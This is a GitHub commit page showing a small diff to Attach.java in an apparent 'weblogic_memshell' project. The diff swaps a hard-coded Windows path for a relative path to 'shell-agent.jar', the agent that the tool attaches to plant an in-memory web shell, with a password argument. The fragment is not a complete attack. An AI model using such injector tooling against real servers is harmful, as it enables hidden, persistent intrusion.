We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent cb93d9e commit e598899Copy full SHA for e598899
inject/src/main/java/Attach.java
@@ -19,8 +19,7 @@ public static void main(String[] args) throws Exception {
19
String password = args[0];
20
String currentPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath();
21
currentPath = currentPath.substring(0, currentPath.lastIndexOf("/") + 1);
22
-// String agentFile = currentPath + "shell-agent.jar";
23
- String agentFile ="D:\\IntelliJ IDEA 2021.1.2\\project\\weblogic_memshell\\memshell_asm\\target\\shell-agent.jar";
+ String agentFile = currentPath + "shell-agent.jar";
24
25
agentFile = new File(agentFile).getCanonicalPath();
26
String agentArgs = currentPath;
0 commit comments